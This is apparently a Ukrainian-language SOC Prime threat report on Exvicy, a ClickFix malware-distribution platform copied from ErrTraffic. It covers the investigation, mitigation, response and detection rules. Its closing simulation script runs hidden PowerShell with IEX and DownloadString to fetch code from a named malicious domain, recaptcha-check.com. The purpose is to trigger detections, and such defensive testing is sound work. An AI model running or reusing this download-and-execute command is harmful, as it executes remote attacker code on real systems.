SOC Prime Bias: High

24 Sep 2026 06:51 UTC

Exvicy: Копія рамки розподілу шкідливого ПО ErrTraffic

Author Photo
SOC Prime Team linkedin icon Стежити
Exvicy: Копія рамки розподілу шкідливого ПО ErrTraffic
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Exvicy – це новітня платформа розповсюдження ClickFix на основі шкідливого програмного забезпечення як послуги (MaaS), яка просувається на форумах кіберзлочинності. Вона використовує соціальну інженерію, імітуючи виклики Cloudflare Turnstile, щоб переконати користувачів виконати шкідливі команди PowerShell через діалогове вікно Windows Run. Платформа тісно копіює ErrTraffic, повторно використовуючи великі частини його кодової бази JavaScript та техніки обфускації.

Розслідування

Аналітики TDR перейшли зі скриншоту панелі адміністрації, розміщеного на форумі Exploit.IN, щоб виявити активну інфраструктуру C2. Аналізуючи конкретні сервери імен Cloudflare та шаблони реєстрації доменів, дослідники виявили кілька зловмисних доменів та скомпрометованих вебсайтів на WordPress. Технічний аналіз підтвердив широке повторне використання коду ErrTraffic, включаючи характерні функції JavaScript та логіку антианалізу.

Пом’якшення

Організації повинні розгортати потужні веб-фільтри, щоб блокувати відомі зловмисні домени та підозрілі TLD, пов’язані з цими кампаніями. Захист кінцевих точок повинен контролювати та обмежувати аномальне виконання PowerShell, особливо команди, що включають irm or iex. Користувачі також повинні бути навчені розпізнавати запити соціальної інженерії, що вимагають використання комбінацій клавіш таких як Win+R , щоб виконувати команди.

Відповідь

Якщо виявлено активність Exvicy, уражені хости слід негайно ізолювати, щоб зупинити подальше виконання команд або доставку шкідливих програм. Відповідачі повинні переглянути операційні журнали PowerShell, щоб визначити виконані команди та пов’язані мережеві з’єднання. Відомі IP-адреси та домени C2 слід блокувати на периметрі, а потім провести перевірку на інші скомпрометовані активи WordPress у середовищі.

Потік атаки

Ми все ще оновлюємо цю частину.

Виявлення

Підозріле управління та контроль запитом DNS за незвичайним доменом верхнього рівня (TLD) (через dns)

Команда SOC Prime
23 вересня 2026

Підозрілий запис RunMRU з семантикою LOLBin (через registry_event)

Команда SOC Prime
23 вересня 2026

IOC (SourceIP) для виявлення: Exvicy: копія платформи розповсюдження шкідливого програмного забезпечення ErrTraffic

Правила SOC Prime AI
23 вересня 2026

IOC (DestinationIP) для виявлення: Exvicy: копія платформи розповсюдження шкідливого програмного забезпечення ErrTraffic

Правила SOC Prime AI
23 вересня 2026

Виявлення шкідливого виконання команд PowerShell для шкідливого програмного забезпечення Exvicy [Windows Powershell]

Правила SOC Prime AI
23 вересня 2026

Виконання команд Framework Exvicy через комбінацію Win + R [Створення процесу Windows]

Правила SOC Prime AI
23 вересня 2026

Виконання симуляції

  • Наратив атаки та команди: Зловмисник доставляє шкідливий ярлик або документ користувачеві через фішинг. Після виконання (T1204.002) користувач ненавмисно запускає процес PowerShell (T1059.001). Мета зловмисника полягає у встановленні точки опори за допомогою завантаження вторинного агента. Щоб імітувати платформу Exvicy, командний рядок розробляється для включення конкретного відомого-зловмисного домену recaptcha-check.com/8E9curHNH8UfAMLz щоб завантажити шкідливий агент.

  • Сценарій регресійного тесту:

    # Сценарій симуляції для активації правила виявлення Exvicy.
    # Це імітує шаблони командного рядка, ідентифіковані в правилі Sigma.
    
    $maliciousUrl = "http://recaptcha-check.com/8E9curHNH8UfAMLz"
    $command = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command `"IEX (New-Object Net.WebClient).DownloadString('$maliciousUrl')`""
    
    Write-Host "[+] Початок симуляції: виконання команди для активації виявлення..."
    Start-Process powershell.exe -ArgumentList "-ExecutionPolicy Bypass -Command `"$command`""
    Write-Host "[+] Команда симуляції відправлена. Перевірте SIEM для попереджень."
  • Команди очищення:

    # Очищення: Жодні постійні файли не створюються цією конкретною симуляцією,
    # але ми переконуємося, що жодні процеси PowerShell не залишаються непоміченими.
    Stop-Process -Name "powershell" -ErrorAction SilentlyContinue
    Write-Host "[+] Очищення завершено."